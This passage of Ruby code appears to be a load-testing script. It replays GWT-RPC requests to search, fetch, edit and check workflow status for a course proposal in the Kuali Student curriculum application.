'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.finalExam.status|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.finalExam.status|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add_thinktime(2)\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n \n # Edit Proposal\n \n if(!opts[:modify_fields][:course_information].empty?)\n \n if(opts[:modify_fields][:course_information][:description])\n \n # Save changes\n contents1 = \"5|0|159|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.core.assembly.data.Data/3119441076|org.kuali.student.core.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.core.assembly.data.Data$StringKey/1742996354|administeringOrgs|org.kuali.student.core.assembly.data.Data$DataValue/4040075329|org.kuali.student.core.assembly.data.Data$IntegerKey/2690592210|java.lang.Integer/3438268394|org.kuali.student.core.assembly.data.Data$StringValue/3696151110|58|_runtimeData|id-translation|%%_#{opts[:id_translation_id_dyn_var]}%%|passFail|org.kuali.student.core.assembly.data.Data$BooleanValue/268767974|java.lang.Boolean/476441737|audit|finalExamStatus|STD|campusLocations|ALL|All|code|%%_#{opts[:code_dyn_var]}%%|courseNumberSuffix|%%_#{opts[:course_num_suffix_dyn_var]}%%|courseSpecificLOs|loCategoryInfoList|desc|formatted|<p>Desc</p>|plain|Desc|effectiveDate|org.kuali.student.core.assembly.data.Data$DateValue/3833457837|java.sql.Timestamp/1769758459|expirationDate|id|%%_#{opts[:lo_category_id_dyn_var]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|versionInd|1|name|%%_#{opts[:lo_category_dyn_var]}%%|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|0|%%_#{opts[:lo_cat_text_dyn_var]}%%|%%_#{opts[:lo_cat_id_dyn_var]}%%|loRepositoryKey|createId|%%_#{opts[:create_id_dyn_var]}%%|createTime|updateId|updateTime|SINGLE USE LO|kuali.lo.type.singleUse|courseTitle|%%_#{opts[:course_title_dyn_var]}%%|creditOptions|fixedCreditValue|10|kuali.creditType.credit.degree.10|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|curriculumOversightOrgs|51|%%_#{opts[:oversight_org_dyn_var]}%%|descr|#{opts[:modify_fields][:course_information][:description]}|dirty|duration|atpDurationTypeKey|kuali.atp.duration.Year|timeQuantity|org.kuali.student.core.assembly.data.Data$IntegerValue/991919491|Year|expenditure|affiliatedOrgs|feeJustification|fees|feeAmounts|currencyQuantity|currencyTypeKey|kuali.currency.type.usdollars.cents|feeType|kuali.enum.type.feeTypes.labFee|%%_#{opts[:lab_fee_id_dyn_var]}%%|rateType|fixedRateFee|Fixed Rate Fee|Laboratory Fee|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_dur_week_id_dyn_var]}%%|2|draft|Lab|%%_#{opts[:lab_id_dyn_var]}%%|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:grade_id_dyn_var]}%%|instructors|personId|%%_#{opts[:person_id_dyn_var]}%%|joints|%%_#{opts[:joints_dyn_var]}%%|pilotCourse|revenues|specialTopicsCourse|subjectArea|%%_#{opts[:subject_area_dyn_var]}%%|termsOffered|kuali.atp.season.Any|Any|kuali.lu.type.CreditCourse|variations|Standard final Exam|transcriptTitle|proposal|%%_#{opts[:proposal_id_dyn_var]}%%|%%_#{opts[:proposal_num_dyn_var]}%%|%%_#{opts[:title_dyn_var]}%%|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|%%_#{opts[:rationale_dyn_var]}%%|kuali.proposal.type.course.create|workflowId|%%_#{opts[:workflow_id_dyn_var]}%%|\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|34|8|9|10|5|6|7|0|2|11|12|0|13|14|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|17|-12|-14|-5|-10|-1|-3|8|18|19|20|0|8|21|19|-22|8|22|13|23|8|24|10|5|6|7|0|2|11|-8|13|25|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|26|-35|-37|-29|-33|-1|-27|8|27|13|28|8|29|13|30|8|31|10|5|6|7|0|1|11|-8|10|5|6|7|0|3|8|32|10|5|6|7|0|1|11|-8|10|5|6|7|0|9|8|33|10|5|6|7|0|2|8|34|13|35|8|36|13|37|-61|-63|8|38|39|40|867724416|1198295875584|0|8|41|39|40|3896582272|1258425417728|0|8|42|13|43|8|44|13|45|8|46|10|5|6|7|0|1|8|47|13|48|-61|-81|8|49|13|50|8|51|13|52|8|53|13|54|-57|-59|-53|-55|8|55|10|5|6|7|0|0|-53|-93|8|56|10|5|6|7|0|7|8|57|13|58|8|33|10|5|6|7|0|2|8|34|13|59|8|36|13|59|-99|-103|8|42|13|60|8|61|13|45|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246181412|1284195221504|916000000|8|65|13|63|8|66|39|40|3246183944|1284195221504|448000000|8|47|13|48|-99|-115|8|49|13|67|8|53|13|68|-53|-97|-49|-51|-1|-47|8|69|13|70|8|71|10|5|6|7|0|1|11|-8|10|5|6|7|0|6|8|72|13|73|8|42|13|74|8|46|10|5|6|7|0|1|8|47|13|58|-143|-149|8|75|10|5|6|7|0|1|11|-8|13|73|-143|-155|8|53|13|76|8|15|10|5|6|7|0|1|8|53|10|5|6|7|0|1|8|16|13|77|-165|-167|-143|-163|-139|-141|-1|-137|8|78|10|5|6|7|0|0|-1|-173|8|79|10|5|6|7|0|2|11|-8|13|80|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|81|-185|-187|-179|-183|-1|-177|8|82|10|5|6|7|0|2|8|36|13|83|8|15|10|5|6|7|0|1|8|84|10|5|6|7|0|1|8|36|19|20|1|-201|-203|-195|-199|-1|-193|8|85|10|5|6|7|0|3|8|86|13|87|8|88|89|12|1|8|15|10|5|6|7|0|1|8|86|10|5|6|7|0|1|8|16|13|90|-221|-223|-212|-219|-1|-210|8|91|10|5|6|7|0|1|8|92|10|5|6|7|0|0|-231|-233|-1|-229|8|93|10|5|6|7|0|0|-1|-237|8|94|10|5|6|7|0|1|11|-8|10|5|6|7|0|5|8|95|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|96|89|12|10|8|97|13|98|-251|-253|-247|-249|8|99|13|100|8|42|13|101|8|102|13|103|8|15|10|5|6|7|0|2|8|102|10|5|6|7|0|1|8|16|13|104|-270|-272|8|99|10|5|6|7|0|1|8|16|13|105|-270|-278|-247|-268|-243|-245|-1|-241|8|106|10|5|6|7|0|1|11|-8|10|5|6|7|0|5|8|107|10|5|6|7|0|1|11|-8|10|5|6|7|0|9|8|108|13|109|8|110|10|5|6|7|0|3|8|111|13|73|8|112|13|113|8|15|10|5|6|7|0|1|8|112|10|5|6|7|0|1|8|16|13|114|-312|-314|-304|-310|-298|-302|8|79|10|5|6|7|0|0|-298|-320|8|115|89|12|100|8|85|10|5|6|7|0|3|8|86|13|116|8|88|89|12|12|8|15|10|5|6|7|0|1|8|86|10|5|6|7|0|1|8|16|13|117|-338|-340|-329|-336|-298|-327|8|42|13|118|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246177449|1284195221504|953000000|8|65|13|63|8|66|39|40|3246183904|1284195221504|408000000|8|47|13|119|-298|-348|8|51|13|120|8|15|10|5|6|7|0|1|8|108|10|5|6|7|0|1|8|16|13|121|-368|-370|-298|-366|-294|-296|-290|-292|8|42|13|122|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246177416|1284195221504|920000000|8|65|13|63|8|66|39|40|3246183890|1284195221504|394000000|8|47|13|119|-290|-378|8|51|13|120|8|53|13|123|-286|-288|-1|-284|8|124|10|5|6|7|0|2|11|-8|13|125|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|126|-406|-408|-400|-404|-1|-398|8|42|13|127|8|128|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|129|13|63|8|15|10|5|6|7|0|1|8|129|10|5|6|7|0|1|8|16|13|130|-428|-430|-422|-426|-418|-420|-1|8|128|8|131|10|5|6|7|0|0|-1|-437|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246166611|1284195221504|115000000|8|65|13|63|8|66|39|40|3246183834|1284195221504|338000000|8|47|13|132|-1|-441|8|133|19|-22|8|134|10|5|6|7|0|0|-1|-459|8|135|19|-22|8|51|13|120|8|136|13|137|8|138|10|5|6|7|0|2|11|-8|13|139|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|140|-477|-479|-471|-475|-1|-469|8|53|13|141|8|142|10|5|6|7|0|0|-1|-487|8|15|10|5|6|7|0|3|8|136|10|5|6|7|0|1|8|16|13|137|-493|-495|8|22|10|5|6|7|0|1|8|16|13|143|-493|-501|-203|10|5|6|7|0|3|8|144|19|-209|8|128|19|-209|8|136|19|-209|-493|-203|-1|-491|8|145|10|5|6|7|0|10|8|42|13|146|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246166532|1284195221504|36000000|8|65|13|63|8|66|39|40|3246183375|1284195221504|879000000|8|47|13|147|-518|-522|8|49|13|148|8|149|10|5|6|7|0|1|11|-8|13|127|-518|-540|8|150|13|151|8|152|10|5|6|7|0|0|-518|-548|8|153|10|5|6|7|0|0|-518|-552|8|154|13|155|8|53|13|156|8|157|13|158|-1|-516|-510|13|159|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n end\n \n end\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n \n end",
"def edit_proposal(proposal_name, opts={})\n \n defaults = {\n :proposal_id_dyn_var => 'ep_proposal_id',\n :proposal_id_regexp => 'proposal.resultColumn.proposalId\\\"\\,\\\"\\([^\\\"]+\\)',\n #:proposal_dyn_var => 'ep_proposal',\n #:proposal_regexp => 'proposal\\\"\\,\\\"\\([^\\\"]+\\)',\n :proposal_num_dyn_var => 'ep_proposal_num',\n :proposal_num_regexp => 'proposal\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"\\([^\\\"]+\\)',\n :workflow_id_dyn_var => 'ep_workflow_id',\n :workflow_id_regexp => 'workflowId\\\"\\,\\\"\\([^\\\"]+\\)',\n :id_translation_id_dyn_var => 'ep_id_translation_id',\n :id_translation_id_regexp => 'id-translation\\\"\\,\\\"\\([^\\\"]+\\)',\n :code_dyn_var => 'ep_code',\n :code_regexp => 'code\\\"\\,\\\"\\([^\\\"]+\\)',\n :course_num_suffix_dyn_var => 'ep_course_num_suffix',\n :course_num_suffix_regexp => 'courseNumberSuffix\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_id_dyn_var => 'ep_lo_cat_id',\n :lo_category_id_regexp => 'expirationDate\\\"\\,\\\"id\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_dyn_var => 'ep_lo_cat',\n :lo_category_regexp => 'name\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_cat_text_dyn_var => 'ep_lo_cat_text',\n :lo_cat_text_regexp => 'loInfo\\\"\\,\\\"sequence\\\"\\,\\\"0\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_cat_id_dyn_var => 'ep_lo_cat_id',\n :lo_cat_id_regexp => '\\([^\\\"]+\\)\\\"\\,\\\"loRepositoryKey',\n :create_id_dyn_var => 'ep_create_id',\n :create_id_regexp => 'createId\\\"\\,\\\"\\([^\\\"]+\\)',\n :course_title_dyn_var => 'ep_course_title',\n :course_title_regexp => 'courseTitle\\\"\\,\\\"\\([^\\\"]+\\)',\n :oversight_org_dyn_var => 'ep_oversight_org',\n :oversight_org_regexp => 'curriculumOversightOrgs\\\"\\,\\\"[^\\,]+\\,\\\"\\([^\\\"]+\\)',\n :lab_fee_id_dyn_var => 'ep_lab_fee_id',\n :lab_fee_id_regexp => 'kuali.enum.type.feeTypes.labFee\\\"\\,\\\"\\([^\\\"]+\\)',\n :atp_dur_week_id_dyn_var => 'ep_atp_dur_week_id',\n :atp_dur_week_id_regexp => 'kuali.atp.duration.Week\\\"\\,\\\"Week\\\"\\,\\\"\\([^\\\"]+\\)',\n :lab_id_dyn_var => 'ep_lab_id',\n :lab_id_regexp => 'Lab\\\"\\,\\\"\\([^\\\"]+\\)',\n :grade_id_dyn_var => 'ep_grade_id',\n :grade_id_regexp => 'kuali.resultComponent.grade[^\\,]+\\,\\\"[^\\,]+\\,\\\"\\([^\\\"]+\\)',\n :person_id_dyn_var => 'ep_person_id',\n :person_id_regexp => 'personId\\\"\\,\\\"\\([^\\\"]+\\)',\n :joints_dyn_var => 'ep_joints',\n :joints_regexp => 'joints\\\"\\,\\\"\\([^\\\"]+\\)',\n :subject_area_dyn_var => 'ep_subject_area',\n :subject_area_regexp => 'subjectArea\\\"\\,\\\"\\([^\\\"]+\\)',\n :title_dyn_var => 'ep_title',\n :title_regexp => 'proposal\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"\\([^\\\"]+\\)',\n :rationale_dyn_var => 'ep_rationale',\n :rationale_regexp => 'rationale\\\"\\,\\\"\\([^\\\"]+\\)',\n :modify_fields => {\n :course_information => {},\n :governance => {},\n :course_logistics => {},\n :learning_objectives => {},\n :active_dates => {},\n :financials => {}\n }\n }\n \n opts = defaults.merge(opts)\n \n # Search for proposal\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|13|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.lang.Integer/3438268394|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|proposal.queryParam.proposalOptionalName|#{proposal_name}|proposal.search.generic|proposal.resultColumn.proposalOptionalName|1|2|3|4|1|5|5|6|10|7|0|8|1|9|10|0|11|12|13|0|6|0|\"\n },\n {\n :dyn_variables => [\n {\"name\" => opts[:proposal_id_dyn_var], \"regexp\" => opts[:proposal_id_regexp]}\n ]\n }\n )\n \n # Select\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|isAuthorized|org.kuali.student.core.rice.authorization.PermissionType/259370389|java.util.Map|java.util.HashMap/962170901|java.lang.String/2004016611|kualiStudentObjectWorkflowId|%%_#{opts[:proposal_id_dyn_var]}%%|1|2|3|4|2|5|6|5|1|7|1|8|9|8|10|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n @request.add_thinktime(2)\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|getMetadata|java.lang.String/2004016611|kualiStudentObjectWorkflowId|%%_#{opts[:proposal_id_dyn_var]}%%|1|2|3|4|2|5|5|6|7|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|getData|java.lang.String/2004016611|%%_#{opts[:proposal_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true',\n :dyn_variables => [\n {\"name\" => opts[:workflow_id_dyn_var], \"regexp\" => opts[:workflow_id_regexp]},\n {\"name\" => opts[:id_translation_id_dyn_var], \"regexp\" => opts[:id_translation_id_regexp]},\n {\"name\" => opts[:code_dyn_var], \"regexp\" => opts[:code_regexp]},\n {\"name\" => opts[:course_num_suffix_dyn_var], \"regexp\" => opts[:course_num_suffix_regexp]},\n {\"name\" => opts[:lo_category_id_dyn_var], \"regexp\" => opts[:lo_category_id_regexp]},\n {\"name\" => opts[:lo_category_dyn_var], \"regexp\" => opts[:lo_category_dyn_var]},\n {\"name\" => opts[:lo_cat_text_dyn_var], \"regexp\" => opts[:lo_cat_text_regexp]},\n {\"name\" => opts[:lo_cat_id_dyn_var], \"regexp\" => opts[:lo_cat_id_regexp]},\n {\"name\" => opts[:create_id_dyn_var], \"regexp\" => opts[:create_id_regexp]},\n {\"name\" => opts[:course_title_dyn_var], \"regexp\" => opts[:course_title_regexp]},\n {\"name\" => opts[:oversight_org_dyn_var], \"regexp\" => opts[:oversight_org_regexp]},\n {\"name\" => opts[:lab_fee_id_dyn_var], \"regexp\" => opts[:lab_fee_id_regexp]},\n {\"name\" => opts[:atp_dur_week_id_dyn_var], \"regexp\" => opts[:atp_dur_week_id_regexp]},\n {\"name\" => opts[:lab_id_dyn_var], \"regexp\" => opts[:lab_id_regexp]},\n {\"name\" => opts[:grade_id_dyn_var], \"regexp\" => opts[:grade_id_regexp]},\n {\"name\" => opts[:person_id_dyn_var], \"regexp\" => opts[:person_id_regexp]},\n {\"name\" => opts[:joints_dyn_var], \"regexp\" => opts[:joints_regexp]},\n {\"name\" => opts[:subject_area_dyn_var], \"regexp\" => opts[:subject_area_regexp]},\n {\"name\" => opts[:proposal_dyn_var], \"regexp\" => opts[:proposal_regexp]},\n {\"name\" => opts[:proposal_num_dyn_var], \"regexp\" => opts[:proposal_num_regexp]},\n {\"name\" => opts[:title_dyn_var], \"regexp\" => opts[:title_regexp]},\n {\"name\" => opts[:rationale_dyn_var], \"regexp\" => opts[:rationale_regexp]}\n ]\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|1|2|3|4|1|5|5|0|0|6|0|7|0|0|0|\"\n }\n )\n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|1|2|3|4|1|5|5|0|0|6|0|7|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.percentage|kuali.resultComponent.grade.recitalReview|kuali.resultComponent.grade.designReview|kuali.resultComponent.grade.completedNotation|lrc.search.resultComponent|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|6|11|12|11|13|11|14|11|15|11|16|11|17|0|18|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.percentage|kuali.resultComponent.grade.recitalReview|kuali.resultComponent.grade.designReview|kuali.resultComponent.grade.completedNotation|lrc.search.resultComponent|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|6|11|12|11|13|11|14|11|15|11|16|11|17|0|18|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.finalExam.status|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.finalExam.status|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add_thinktime(2)\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n 